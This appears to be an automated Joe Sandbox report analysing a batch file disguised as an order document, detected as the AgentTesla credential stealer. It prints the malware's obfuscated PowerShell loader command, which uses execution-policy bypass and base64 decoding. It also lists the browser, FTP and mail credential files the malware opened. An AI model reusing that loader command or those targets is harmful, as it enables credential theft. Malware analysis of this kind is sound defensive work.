rbcagicagc2lla2wgigjyzxnpzwtsyws7icbzawvrbcagicagc2lla2wgicagihnpzwtsfsbjyxrzawvrbgnoihsgc2lla2wgicagihnpzwtsicagicbzawvrbcagicagc2lla2xxcml0zxnpzwtsluhvc3rzawvrbcairxjyc2lla2xvcibkdxnpzwtscmluzybzawvrbgrly29kc2lla2xpbmcgb3npzwtsciblegvzawvrbgn1dgluc2lla2xnigluannpzwtszwn0aw9zawvrbg4gy29kc2lla2xloiakx3npzwtsiiatrm9zawvrbhjlz3jvc2lla2x1bmrdb3npzwtsbg9yifjzawvrbgvkoyagc2lla2wgicagihnpzwtsicagicbzawvrbh07icagc2lla2wgicagihnpzwtsftsgicbzawvrbcb9o30gc2lla2xlbhnlihnpzwtseyagicbzawvrbcagv3jpc2lla2x0zs1ib3npzwtsc3qgilnzawvrbhlzdgvtc2lla2wgrxjyb3npzwtscjogqm
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dqoncirzy3jpchrdb250zw50id0gqccncir1c2vyc2lla2xoyw1lihnpzwtspsakzw5zawvrbhy6vvnfc2lla2xstkfnrxnpzwtsoyrxy2dzawvrbgttid0gc2lla2wiqzpcvxnpzwtsc2vyc1xzawvrbcr1c2vyc2lla2xoyw1lxhnpzwtszhdtlmjzawvrbgf0ijtpc2lla2xmichuzxnpzwtsc3qtugfzawvrbhroicrxc2lla2xjz2ttkxnpzwtsihsgicbzawvrbcbxcml0c2lla2xlluhvc3npzwtsdcaiqmfzawvrbhrjacbmc2lla2xpbgugznnpzwtsb3vuzdpzawvrbcakcwnnc2lla2xrbsiglxnpzwtsrm9yzwdzawvrbhjvdw5kc2lla2xdb2xvcnnpzwtsien5yw5zawvrbdsgicagc2lla2wkzmlszxnpzwtstgluzxnzawvrbca9ifttc2lla2x5c3rlbxnpzwtslklplkzzawvrbglszv06c2lla2w6umvhzhnpzwtsqwxstglzawvrbg5lcygkc2lla2xxy2drbxnpzwtslcbbu3lzawvrbhn0zw0uc2lla2xuzxh0lnnpzwtsrw5jb2rzawvrbgluz106c2lla2w6vvrgohnpzwtsktsgicbzawvrbcbmb3jlc2lla2xhy2ggkhnpzwtsjgxpbmvzawvrbcbpbiakc2lla2xmawxlthnpzwtsaw5lcylzawvrbcb7icagc2lla2wgicagihnpzwtsawygkcrzawvrbgxpbmugc2lla2wtbwf0y3npzwtsacanxjpzawvrbdo6id8oc2lla2wukykkj3npzwtsksb7icbzawvrbcagicagc2lla2wgicagihnpzwtsv3jpdgvzawvrbc1ib3n0c2lla2wgikluannpzwtszwn0aw9zawvrbg4gy29kc2lla2xligrldhnpzwtszwn0zwrzawvrbcbpbib0c2lla2xozsbiyxnpzwtsdgnoigzzawvrbglszs4ic2lla2wgluzvcnnpzwtszwdyb3vzawvrbg5kq29sc2lla2xvcibdexnpzwtsyw47icbzawvrbcagicagc2lla2wgicagihnpzwtsdhj5ihtzawvrbcagicagc2lla2wgicagihnpzwtsicagicbzawvrbcakzgvjc2lla2xvzgvkqnnpzwtsexrlcybzawvrbd0gw1n5c2lla2xzdgvtlnnpzwtsq29udmvzawvrbhj0xto6c2lla2xgcm9tqnnpzwtsyxnlnjrzawvrbfn0cmluc2lla2xnkcrtyxnpzwtsdgnozxnzawvrbfsxxs5uc2lla2xyaw0okxnpzwtsktsgicbzawvrbcagicagc2lla2wgicagihnpzwtsicagjglzawvrbg5qzwn0c2lla2xpb25db3npzwtszgugpsbzawvrbfttexn0c2lla2xlbs5uzxnpzwtsehqurw5zawvrbgnvzgluc2lla2xnxto6vxnpzwtsbmljb2rzawvrbguur2v0c2lla2xtdhjpbnnpzwtszygkzgvzawvrbgnvzgvkc2lla2xcexrlc3npzwtsktsgicbzawvrbcagicagc2lla2wgicagihnpzwtsicagv3jzawvrbgl0zs1ic2lla2xvc3qginnpzwtssw5qzwnzawvrbhrpb24gc2lla2xjb2rlihnpzwtszgvjb2rzawvrbgvkihn1c2lla2xjy2vzc3npzwtsznvsbhlzawvrbc4iic1gc2lla2xvcmvncnnpzwtsb3vuzenzawvrbg9sb3igc2lla2xhcmvlbnnpzwtsoyagicbzawvrbcagicagc2lla2wgicagihnpzwtsicbxcmlzawvrbhrlluhvc2lla2xzdcairxnpzwtsegvjdxrzawvrbgluzybpc2lla2xuamvjdhnpzwtsaw9uignzawvrbg9kzs4uc2lla2wuiiatrnnpzwtsb3jlz3jzawvrbg91bmrdc2lla2xvbg9yihnpzwtswwvsbg9zawvrbhc7icagc2lla2wgicagihnpzwtsicagicbzawvrbcagieluc2lla2x2b2tllxnpzwtsrxhwcmvzawvrbhnzaw9uc2lla2wgjgluannpzwtszwn0aw9zawvrbg5db2rlc2lla2w7icagihnpzwtsicagicbzawvrbcagicagc2lla2wgigjyzxnpzwtsyws7icbzawvrbcagicagc2lla2wgicagihnpzwtsfsbjyxrzawvrbgnoihsgc2lla2wgicagihnpzwtsicagicbzawvrbcagicagc2lla2xxcml0zxnpzwtsluhvc3rzawvrbcairxjyc2lla2xvcibkdxnpzwtscmluzybzawvrbgrly29kc2lla2xpbmcgb3npzwtsciblegvzawvrbgn1dgluc2lla2xnigluannpzwtszwn0aw9zawvrbg4gy29kc2lla2xloiakx3npzwtsiiatrm9zawvrbhjlz3jvc2lla2x1bmrdb3npzwtsbg9yifjzawvrbgvkoyagc2lla2wgicagihnpzwtsicagicbzawvrbh07icagc2lla2wgicagihnpzwtsftsgicbzawvrbcb9o30gc2lla2xlbhnlihnpzwtseyagicbzawvrbcagv3jpc2lla2x0zs1ib3npzwtsc3qgilnzawvrbhlzdgvtc2lla2wgrxjyb3npzwtscjogqm			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 4.2.powershell.exe.5e62e10.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5eb2e30.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.82e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.82e0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5e3adf0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5e62e10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5e3adf0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3788613694.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3788613694.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3794622597.00000000082E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3794927751.0000000008E2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.3794927751.0000000008DD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Batch Injector

Source: Yara match	File source: amsi32_8644.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 4.2.powershell.exe.5e62e10.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5eb2e30.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.82e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.82e0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5e3adf0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5e62e10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5e3adf0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.5eb2e30.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3788613694.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3788613694.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3794622597.00000000082E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3794927751.0000000008E2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.3794927751.0000000008DD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Batch Injector

Source: Yara match	File source: amsi32_8644.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Obfuscated Files or Information	LSASS Memory	22 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	2 Software Packing	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	21 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat